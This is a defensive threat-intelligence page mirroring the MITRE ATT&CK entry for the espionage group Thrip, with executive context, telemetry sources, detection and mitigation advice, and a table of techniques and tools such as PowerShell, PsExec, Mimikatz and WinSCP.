G0076: Thrip
Analyst context for executives and security teams
Thrip matters because ATT&CK describes it as an espionage group associated with satellite communications, telecom, and defense contractor targeting, using both custom malware and legitimate administration tools. For leaders, the practical issue is not just “malware detection”; it is whether the organization can recognize credential theft, remote administration abuse, scripted execution, and data movement that may look like normal IT activity.
Executive priority
Prioritize this as a resilience and assurance question for high-value engineering, communications, defense, and infrastructure environments. Executives should ask whether SOC and IR teams can prove visibility over privileged Windows activity, remote access tooling, PowerShell use, and outbound unencrypted data transfer. This also supports audit and compliance evidence: approved remote tools, privileged access controls, logging retention, and incident response playbooks should be demonstrable, not assumed.
Technical view
ATT&CK provides no official detection text for Thrip, so defensive validation should be built from the related behaviors and software: Mimikatz credential dumping, PsExec-style remote execution, PowerShell execution, remote desktop software for command and control, Catchamas information stealing, and exfiltration over unencrypted non-C2 protocols. SOC teams should test whether legitimate admin activity can be distinguished from suspicious use by context: source host, account privilege, command line, service creation, lateral movement pattern, remote session timing, and unusual outbound destinations or protocols.
Likely telemetry
- Windows security events for logon activity, privileged account use, service creation, and remote execution patterns
- Endpoint detection telemetry including process creation, command-line arguments, parent-child process relationships, and file execution metadata
- PowerShell logging, including script block/module logging where available
- Credential access indicators such as LSASS access attempts or credential dumping detections
- PsExec-related evidence such as admin share access, remote service creation, and named pipe activity
Detection direction
- Validate detections for credential dumping and privileged authentication anomalies rather than relying only on malware signatures.
- Tune PsExec and PowerShell detections to account for legitimate administration while alerting on unusual source systems, rare accounts, suspicious command lines, and lateral movement bursts.
- Maintain an allowlist and audit trail for remote desktop/support software; alert on newly introduced, unauthorized, or unusual remote access tools.
- Monitor outbound unencrypted protocols for volume, destination rarity, sensitive host sources, and transfers outside expected business workflows.
- Use relationship context to build analytic coverage across the chain: credential access, remote execution, interactive control, information theft, and exfiltration.
Mitigation priorities
- Start with privileged access hygiene: reduce standing administrative rights, enforce strong authentication, and review where high-value credentials can be exposed on Windows systems.
- Control and monitor legitimate administration tools such as PsExec, PowerShell, and remote desktop/support software through policy, logging, and approved-use governance.
- Segment and closely monitor high-value communications, defense, engineering, and operational environments where applicable to the organization.
- Improve egress governance by restricting unnecessary unencrypted outbound protocols and reviewing destinations allowed from sensitive systems.
- Ensure incident response playbooks cover credential theft, lateral movement using admin tools, remote access tool abuse, and suspected data exfiltration.
Analyst notes and limits
The decision value is in validating whether “living off the land” activity is observable and explainable. Thrip’s related software and techniques point to a blend of credential theft, legitimate tool abuse, remote control, and data theft, which often defeats programs that focus only on known malware indicators.
The supplied ATT&CK object does not specify platforms or tactics for the group itself and provides no official detection guidance. Platform references come only from related software and techniques. Local environment data is required to determine relevance, normal administrative baselines, and actual detection coverage.
Thrip
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1059.001 | PowerShell Sub-technique | Thrip leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance.CitationSymantec Thrip June 2018 |
| Enterprise | T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol Sub-technique | Thrip has used WinSCP to exfiltrate data from a targeted organization over FTP.CitationSymantec Thrip June 2018 |
| Enterprise | T1219.002 | Remote Desktop Software Sub-technique | Thrip used a cloud-based remote access software called LogMeIn for their attacks.CitationSymantec Thrip June 2018 |
| Enterprise | T1588.002 | Tool Sub-technique |
Groups, software, and campaigns
S0029: PsExec
S0002: Mimikatz
S0261: Catchamas
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.2 | Current bundle | a03a2d6f2470… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Symantec Thrip June 2018
Security Response Attack Investigation Team. (2018, June 19). Thrip: Espionage Group Hits Satellite, Telecoms, and Defense Companies. Retrieved July 10, 2018.
Open source URL -
[2]
Thrip
(Citation: Symantec Thrip June 2018)
-
[3]
mitre-attack G0076Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.